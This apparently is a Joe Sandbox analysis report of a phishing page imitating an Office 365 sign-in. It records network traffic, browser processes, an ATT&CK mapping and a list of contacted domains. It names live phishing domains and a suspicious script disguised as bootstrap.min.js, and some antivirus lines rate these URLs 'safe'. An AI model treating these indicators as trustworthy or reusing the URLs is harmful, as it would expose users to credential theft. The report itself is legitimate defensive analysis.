      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: ydpj.auramisteriosafyr.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: ydpj.auramisteriosafyr.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: offce365.auramisteriosafyr.it.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 6013971728-1317754460.cos.ap-bangkok.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: ydpj.auramisteriosafyr.it.com
      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3789sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1cf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 53Access-Control-Allow-Origin: *Access-Control-Expose-Headers: *Timing-Allow-Origin: *Cache-Control: public, max-age=600, s-maxage=600Cross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Type: text/plain; charset=utf-8ETag: W/"35-Su9w8wyWNKnBnB1glhnyKiBNAH4"Accept-Ranges: bytesAge: 0Date: Mon, 24 Mar 2025 04:00:04 GMTX-Served-By: cache-fra-etou8220171-FRA, cache-lga21982-LGAX-Cache: MISS, MISSVary: Accept-Encodingalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 04:00:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UBk3rQnclcxXKeAPlIheZ9QYWnQ%2BzqjVzkYHto1DL1PB4nncH5Fg6dUbhHeCXiAQKHc36%2FSBtz%2BE3APxMn9Kaxhrg6ctmkYonyYsuEq08YD3g70Zf1nyKaNEHMcPz1Nr2X7N7Q4DHztwHGsUGhentSWXno%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9253427a7c054294-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=96747&min_rtt=96446&rtt_var=20640&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2864&recv_bytes=1253&delivery_rate=38619&cwnd=248&unsent_bytes=0&cid=0d6d9ae2b3b3df3e&ts=3060&x=0"
      Source: chromecache_85.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
      Source: chromecache_73.1.drString found in binary or memory: https://getbootstrap.com)
      Source: chromecache_75.1.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_75.1.dr, chromecache_73.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_75.1.dr, chromecache_73.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownHTTPS traffic detected: 172.67.210.168:443 -> 192.168.2.16:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.210.168:443 -> 192.168.2.16:49706 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.65.196:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 43.128.193.190:443 -> 192.168.2.16:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.59.5:443 -> 192.168.2.16:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.77.220.51:443 -> 192.168.2.16:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.77.220.51:443 -> 192.168.2.16:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.59.5:443 -> 192.168.2.16:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49754 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6956_1673119065Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6956_1673119065Jump to behavior
      Source: classification engineClassification label: mal64.phis.win@24/36@36/16
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4225585014450391825,7605761118986401797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://offce365.auramisteriosafyr.it.com/CM4kN/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4225585014450391825,7605761118986401797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      12
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1646519 URL: https://offce365.auramister... Startdate: 24/03/2025 Architecture: WINDOWS Score: 64 24 AI detected phishing page 2->24 26 Yara detected HtmlPhish10 2->26 28 Phishing site or detected (based on various text indicators) 2->28 30 AI detected suspicious URL 2->30 6 chrome.exe 3 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.16, 138, 443, 49668 unknown unknown 6->14 16 192.168.2.6 unknown unknown 6->16 11 chrome.exe 6->11         started        process5 dnsIp6 18 offce365.auramisteriosafyr.it.com 172.67.210.168, 443, 49705, 49706 CLOUDFLARENETUS United States 11->18 20 cos.ap-bangkok.myqcloud.com 43.128.193.190, 443, 49745 LILLY-ASUS Japan 11->20 22 25 other IPs or domains 11->22

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://offce365.auramisteriosafyr.it.com/CM4kN/0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://ydpj.auramisteriosafyr.it.com/google.php0%Avira URL Cloudsafe
      https://6013971728-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
      https://offce365.auramisteriosafyr.it.com/favicon.ico0%Avira URL Cloudsafe

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      jsdelivr.map.fastly.net
      151.101.129.229
      truefalse
        high
        stackpath.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          s-part-0012.t-0009.t-msedge.net
          13.107.246.40
          truefalse
            high
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              e329293.dscd.akamaiedge.net
              23.209.72.9
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.10.207
                truefalse
                  high
                  cos.ap-bangkok.myqcloud.com
                  43.128.193.190
                  truefalse
                    high
                    ydpj.auramisteriosafyr.it.com
                    104.21.59.5
                    truefalse
                      high
                      s-part-0010.t-0009.t-msedge.net
                      13.107.246.38
                      truefalse
                        high
                        code.jquery.com
                        151.101.66.137
                        truefalse
                          high
                          offce365.auramisteriosafyr.it.com
                          172.67.210.168
                          truetrue
                            unknown
                            cdnjs.cloudflare.com
                            104.17.24.14
                            truefalse
                              high
                              challenges.cloudflare.com
                              104.18.94.41
                              truefalse
                                high
                                e1315.dsca.akamaiedge.net
                                104.77.220.51
                                truefalse
                                  high
                                  www.google.com
                                  142.250.65.196
                                  truefalse
                                    high
                                    res.cloudinary.com
                                    unknown
                                    unknownfalse
                                      high
                                      cdn.jsdelivr.net
                                      unknown
                                      unknownfalse
                                        high
                                        6013971728-1317754460.cos.ap-bangkok.myqcloud.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          aadcdn.msftauth.net
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://ydpj.auramisteriosafyr.it.com/google.phpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                              high
                                              https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/false
                                                  high
                                                  https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                    high
                                                    https://6013971728-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.jsfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                        high
                                                        https://offce365.auramisteriosafyr.it.com/favicon.icotrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.pngfalse
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92534274b8aa19bf&lang=autofalse
                                                            high
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92534274b8aa19bf/1742788807266/t_YM1B0tRxzYOOqfalse
                                                                high
                                                                https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                  high
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92534274b8aa19bf/1742788807263/6ee634dbbf7ff9584613e98f7de557fe79dd0a00decd0e99ab6d059eb555f365/J5KFquRooOBDcIdfalse
                                                                    high
                                                                    https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                      high
                                                                      https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.pngfalse
                                                                        high
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1false
                                                                          high
                                                                          https://a.nel.cloudflare.com/report/v4?s=5UBk3rQnclcxXKeAPlIheZ9QYWnQ%2BzqjVzkYHto1DL1PB4nncH5Fg6dUbhHeCXiAQKHc36%2FSBtz%2BE3APxMn9Kaxhrg6ctmkYonyYsuEq08YD3g70Zf1nyKaNEHMcPz1Nr2X7N7Q4DHztwHGsUGhentSWXno%3Dfalse
                                                                            high
                                                                            https://offce365.auramisteriosafyr.it.com/CM4kN/true
                                                                              unknown
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://getbootstrap.com/)chromecache_75.1.drfalse
                                                                                high
                                                                                https://github.com/twbs/bootstrap/graphs/contributors)chromecache_75.1.dr, chromecache_73.1.drfalse
                                                                                  high
                                                                                  https://getbootstrap.com)chromecache_73.1.drfalse
                                                                                    high
                                                                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_75.1.dr, chromecache_73.1.drfalse
                                                                                      high
                                                                                      http://opensource.org/licenses/MIT).chromecache_85.1.drfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.18.10.207
                                                                                        stackpath.bootstrapcdn.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        151.101.129.229
                                                                                        jsdelivr.map.fastly.netUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        104.18.94.41
                                                                                        challenges.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.77.220.51
                                                                                        e1315.dsca.akamaiedge.netUnited States
                                                                                        16625AKAMAI-ASUSfalse
                                                                                        172.67.210.168
                                                                                        offce365.auramisteriosafyr.it.comUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        151.101.66.137
                                                                                        code.jquery.comUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        35.190.80.1
                                                                                        a.nel.cloudflare.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        23.209.72.31
                                                                                        unknownUnited States
                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                        104.21.59.5
                                                                                        ydpj.auramisteriosafyr.it.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.17.24.14
                                                                                        cdnjs.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        23.209.72.9
                                                                                        e329293.dscd.akamaiedge.netUnited States
                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                        142.250.65.196
                                                                                        www.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        43.128.193.190
                                                                                        cos.ap-bangkok.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                                        104.18.95.41
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        IP
                                                                                        192.168.2.16
                                                                                        192.168.2.6
                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1646519
                                                                                        Start date and time:2025-03-24 04:59:26 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 3m 43s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
